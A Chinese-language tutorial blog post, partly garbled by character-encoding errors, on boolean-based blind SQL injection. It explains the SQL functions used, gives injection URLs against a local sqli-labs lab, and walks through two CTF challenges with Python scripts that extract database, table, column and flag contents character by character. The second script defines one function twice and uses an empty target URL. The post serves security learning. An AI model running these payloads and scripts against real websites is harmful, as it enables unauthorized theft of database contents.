python 布爾注入原理及滲透過(guò)程示例

更新時(shí)間：2022年10月18日 11:22:48 作者：XINO

這篇文章主要介紹了python 布爾注入原理及滲透過(guò)程示例，有需要的朋友可以借鑒參考下，希望能夠有所幫助，祝大家多多進(jìn)步，早日升職加薪

引文

之前有一篇文章給大家?guī)?lái)了SQL注入的基本知識(shí)點(diǎn)以及分類，包含的面比較廣但是不深入，于是我準(zhǔn)備詳細(xì)講講每一種類型的SQL注入的詳細(xì)利用方法以及場(chǎng)景，今天給大家?guī)?lái)的是布爾盲注，也是比較常用的一種注入方式。

基本知識(shí)

什么是布爾注入？

先了解一下什么是布爾盲注，在平常我們?cè)诰W(wǎng)頁(yè)輸入SQL語(yǔ)句網(wǎng)頁(yè)會(huì)給我們關(guān)于SQL語(yǔ)句的回顯，比如SQL錯(cuò)報(bào)信息，我們根據(jù)這些錯(cuò)報(bào)信息去進(jìn)行SQL注入，但你們有沒(méi)有想過(guò)，如果當(dāng)我們傳入語(yǔ)句網(wǎng)站不會(huì)給我們回顯時(shí)，我們?cè)撛趺崔k呢，這時(shí)我們引入布爾注入的概念，即通過(guò)一些判斷語(yǔ)句來(lái)確認(rèn)數(shù)據(jù)庫(kù)的內(nèi)部信息，可以看看下面的圖：

有回顯

無(wú)回顯

下面就告訴大家如何在只有兩種回顯的頁(yè)面，利用函數(shù)來(lái)實(shí)現(xiàn)我們的布爾盲注。

函數(shù)

下面給大家舉例一下布爾盲注中常用的函數(shù)以及他們的作用：

length(str)：返回str字符串的長(zhǎng)度。

substr(str, pos, len)：將str從pos位置開(kāi)始截取len長(zhǎng)度的字符進(jìn) 行返回。注意這里的pos位置是從1開(kāi)始的，不是數(shù)組的0開(kāi)始

mid(str,pos,len):跟上面的一樣，截取字符串

ascii(str)：返回字符串str的最左面字符的ASCII代碼值。

ord(str):同上，返回ascii碼

if(a,b,c) :a為條件，a為true，返回b，否則返回c，如if(1>2,1,0),返回0

當(dāng)然這只是最常見(jiàn)的函數(shù)，當(dāng)上面這些被禁用時(shí)，我們可以尋找其他的函數(shù)，下面給大家舉例如何利用這些函數(shù)。

根據(jù)布爾型的規(guī)則，網(wǎng)頁(yè)只給我們返回TRUE或者FALSE,那么我們像下面這樣進(jìn)行傳參：

http://127.0.0.1/Less-8/?id=1'and (length(database()))>8 --+

判斷數(shù)據(jù)庫(kù)名字長(zhǎng)度是否大于8，正確返回TRUE，錯(cuò)誤返回FALSE。

注入過(guò)程

假如我們已經(jīng)判斷完數(shù)據(jù)庫(kù)的名字長(zhǎng)度，接下來(lái)就來(lái)猜測(cè)數(shù)據(jù)庫(kù)的第一個(gè)字母是什么:

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1'and ascii(substr(database(),1,1))>110#

我們可以根據(jù)二分法來(lái)進(jìn)行判斷，當(dāng)我們ASCII為110返回為T(mén)RUE，111時(shí)為FALSE，我們就可以判斷ASCII碼為110對(duì)應(yīng)的字符為數(shù)據(jù)庫(kù)的第一個(gè)名稱。關(guān)于ASCII對(duì)應(yīng)的值可以參考下面的圖：

同理我們修改匹配的數(shù)據(jù)庫(kù)字段來(lái)查詢第二個(gè)字符：

substr(database(),2,1)

查詢出數(shù)據(jù)庫(kù)的名字為security后我們按順序查詢表名的第一個(gè)字母：

1' and (ascii(substr((select table_name from information_schema.tables
 where table_schema=''security limit 0,1),1,1)))>100 --+

最后得到表名為emails，于是我們查詢字段值的第一個(gè)字母：

1' and (ascii(substr((select column_name from information_schema.columns
 where table_name='emails'),1,1)))&gt;100 --+

最后得到字段值。

大家有沒(méi)有發(fā)現(xiàn)如果我們一個(gè)一個(gè)的試時(shí)間成本是不是很大，于是我們可以編寫(xiě)腳本來(lái)自動(dòng)循環(huán)跑出來(lái)。下面會(huì)給大家?guī)?lái)例題。

例題

例題一

給了我們一個(gè)搜索框:

我們嘗試輸入后發(fā)現(xiàn)，輸入1回顯Hello, glzjin wants a girlfriend，輸入2回顯Do you want to be my girlfriend?，輸入大于2的數(shù)回顯：Error Occured When Fetch Result,而且還會(huì)檢測(cè)我們語(yǔ)句過(guò)濾了union等關(guān)鍵字，但是沒(méi)有過(guò)濾(),考慮布爾盲注。嘗試構(gòu)造PAYLOAD:

id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))

回顯正常，可以進(jìn)行SQL注入，我們利用腳本：

import requests
import time
import re
url='http://4f098f39-88d5-4922-afcc-06e3cfa8ac6e.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
    max = 127
    min = 0
    for c in range(0,127):
        s = (int)((max+min)/2)
        payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(0.005)
        if 'Hello, glzjin wants a girlfriend.' in str(r.content):
            min=s
        else:
            max=s
        if((max-min)<=1):
            flag+=chr(max)
            print(flag)
            break

運(yùn)行得到FLAG:

例題二

也是一個(gè)搜索框，我們分別輸入1和1'，得到以下回顯：

猜測(cè)是布爾注入，我們先查詢數(shù)據(jù)庫(kù)長(zhǎng)度：

1 and length(database()) >5

得到數(shù)據(jù)庫(kù)長(zhǎng)度為4后，我們查詢數(shù)據(jù)庫(kù)名字：

1 and ascii(substr(database(),1,1))=115

得到庫(kù)名為sqli，接下來(lái)就是查詢表和字段等操作了，在網(wǎng)上找了一個(gè)腳本來(lái)讓他自己跑：

import requests
# 爆庫(kù)
def dataBaseName(url, mark):
    name = ''
    for i in range(1, 9):
        for j in "sqcwertyuioplkjhgfdazxvbnm":
            payload = url + "if(substr(database(),%d,1)='%s',1,0)" % (i, j)
            r = requests.get(payload)
            if mark in r.text:
                name = name + j
                print(name)
                break   
    print('數(shù)據(jù)庫(kù)名:', name)
# 爆表
def table_name(url,mark):
    tableList = []
    for i in range(0,4):
        name = ''
        for j in range(1,9):
            for k in 'sqcwertyuioplkjhgfdazxvbnm':
                payload = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    name = name + k
                    print(name)
                    break
        tableList.append(name)
    print('table_name:',tableList)
# 爆字段
def column_name(url,mark):
    columnList = []
    for i in range(0,3):
        columnName = ''
        for j in range(1,9):
            for k in 'sqcwertyuioplkjhgfdazxvbnm':
                payload = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema = database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    columnName += k
                    print(columnName)
                    break
        columnList.append(columnName)
    print("字段名：",columnList)
# 爆字段第一個(gè)行內(nèi)容
def get_data(url,mark):
    data = ''
    for i in range(1,50):
        for j in range(48,126):
            payload = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,0)' %(i,j)
            r = requests.get(payload)
            if mark in r.text:
                data += chr(j)
                print(data)
                break
    print("字段第一個(gè)值",data)
# 爆字段前10行內(nèi)容
def get_data(url,mark):
    dataList = []
    for i in range(1,10):
        data = ''
        for j in range(1,50):
            for k in range(48,126):
                payload = url + 'if(ASCII(SUBSTR((SELECT flag FROM `flag` limit %d,1),%d,1))=%d,1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    data += chr(k)
                    print(data)
                    break
        dataList.append(data)
    print("字段前10行內(nèi)容",dataList)
if __name__ == "__main__":
    url = "/?id="
    mark = "query_success"
    dataBaseName(url, mark)
    table_name(url, mark)
    column_name(url, mark)
    get_data(url,mark)